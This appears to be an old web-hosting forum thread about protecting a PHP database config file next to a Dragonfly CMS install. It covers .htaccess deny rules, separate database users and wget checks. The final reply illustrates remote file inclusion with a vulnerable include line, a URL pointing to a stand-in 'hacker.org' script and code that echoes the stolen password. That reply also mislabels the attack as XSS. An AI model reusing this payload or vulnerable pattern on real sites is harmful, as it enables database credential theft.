[Yes, I admit it, this is not strictly a CPG/Dragonfly question but does impact indirectly on the security of my Dragonfly installation so I hope I'll be forgiven!]

In a nutshell, I need to install another app which accesses the same db as Dragonfly and I want to do what I can to make sure that it doesn't compromise the overall security of the current set up. Specifically I could do with some guidance as to what directory permissions and .htaccess contents I should use to protect the db config file for this new app.

If my current Dragonfly installation directory is

/public_html/

then the installation directory for the new app would be

/public_html/newapp

and the config file

/public_html/newapp/config.php

Advice on permissions for the file, the directory and the .htaccess file would be very much appreciated. Alternatively if someone can point me to a relevant resource instead that would also be great, thank you.

Mac

how would it use the same db as dragonfly? it depends what the app is for permissions, you should go to the apps website for help

Er...OK, so there's no generic advice which might apply to situations like this? i.e. a bare minimum of entries for the .htaccess file etc.? (I'm not suggesting that's the case, just double checking)

Thanks for your reply.

Cheers,

Mac

Why not keep your config file somewhere else on your filesystem (i.e. not public_html). Then just refer to it with the full path.

Alternatively, have a master config.php somewhere and create symlinks to it whenever you need to.

Usually though, apps have very different config.php files, unless you've specifically programmed it to use the same variable names.

I'm sorry, I must be a little slow this evening, I'm not sure how that relates to my question? Thanks anyway.

Mac

We can't guarantee and do not know the security of that other script.
So we can't tell you what you must do.

Dragonfly security is dragonfly only so if that other script connects to the same database then the other script must be secure enough that someone can't access the Dragonfly CMS tables.

Also moving config.php outside the public_html is a useless action and doesn't improve security.

.htaccess doesn't have to be modified either unless that other script asks for it.
Then it still isn't a problem because the other script's .htaccess goes into the sub-directory.

Thanks for the reply but I'm afraid I may have somehow misrepresented the question I was trying to ask. I was simply looking for some guidance on what I should do to protect a file which includes a db name, username and password (regardless of whether this is the file used by Dragonfly, this app or any other). My apologies for the confusion. My fear is that somehow the config file used by this 3rd party app might be accessible in some way which would allow its contents to be read (and thus allow access to the db used by both the app and Dragonfly). This is a separate config file in a separate directory with its own .htaccess file.

No problem though, thanks all for taking the time to reply.

Cheers,

Mac

A .htaccess file isn't going to make any difference whatsoever.

What you've effectively asked, if you pardon my real-world example, is - If I had a door in my house, will anyone other than me open it?

You can never ever guarantee security, all you do is do your best to prevent unwanted eyes from seeing sensitive files.

OK, I think I'm out of my depth here. I see from the Dragonfly .htaccess file the following and thought I might want to use something similar for the other (3rd party app) config file:

Quote::

# disable access to config.php and .ht* from a browser <FilesMatch "^(config\.php|\.ht)"> Deny from all </FilesMatch>

Regarding preventing others from seeing sensitive files that's exactly what I was trying to ask (i.e. how can I best do that for this file?), and how I should have phrased it originally!

Cheers,

Mac

According to Netcraft your host is pretty well up to date on patches: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.3.11 mod_ssl/2.8.22 OpenSSL/0.9.7a

If Apache is configured properly there should be no reason at all to fiddle about denying access to PHP scripts as it should handle requests for them in the appropriate manner.

Understood, that's good news. Thanks!

Mac

there's a whole whost of things you can do to check in case of security paranoia (which I think everyone suffers from ever now and again).

A very simple browser check:

view-source:www.yourhost.com/newapp/config.php

Or from shell:

wget www.yourhost.com/newapp/config.php

Of course these are the simplest tests on earth but they're always worth checking. I'm sure your host will have set up Apache properly to handle .php extensions.

Thanks for that! I'd rather check simple things than just assume they're OK too.

Cheers,

Mac

All I can add to this already confusing topic is make sure you are running a current version of mod_security on your apache server.

HTH,

Ok i will tell some info about secure files.
There are several ways to secure a file:

1) Deny access thru .htaccess (Apache only)
2) Put the data in a serverside script (cgi, php, asp, etc.)
3) Don't put it on the server

Since #1 is apache only and #3 is not what you want they both are not the best solutions so the best way is #2.

If the server handles .php files (iow the PHP is "processed" and you don't see it like a .txt file) then we can use such file.

PHP:

<?php // This data isn't echoed unless we want it to. $db_password = "13456"; echo $db_password; // BAD IDEA ?>

However this doesn't protect against overwrite

PHP:

<?php include('config.php'); $db_password = "456789"; // overwrite

This doesn't do much it overwrites and probably denies access. But we do find a issue and that's called XSS (Cross Serverside Scripting).

For example your code isn't properly coded and does

PHP:

include("$name.php");

$name isn't checked AND register_globals is on/used (like in CPG-Nuke 8.x) AND allow_url_fopen is on in php.ini (default)
Then a url like "mydomain.com/index.php?name=http://hacker.org/script" will open the exploit

PHP:

$name = 'http://hacker.org/script'; include("$name.php");

The script.php contains

PHP:

include('config.php'); echo $db_password;

Then it knows your DB password.
Most people don't think about creating a seperate DB user in the cPanel -> MySQL admin, they just use their FTP/cPanel login details.
This results in a immediate "owned" server and they can do whatever they want with the server.
So to prevent this from happening it's best you create a DB user and "hook" that user to your database, then setup config.php to this user

PHP:

$dbuser = 'mydomain_user'; $dbpassword = '!dbP@ssw0rd';

This way they only have access to the webspace (thru PHP) and the database (that's why daily backups are important)

However some people are more skilled and could destroy the complete server if they want to.

I hope this explains that config.php isn't realy a security issue but the complete script system itself is your main concern. Also your own skills to create a seperate DB login is the issue.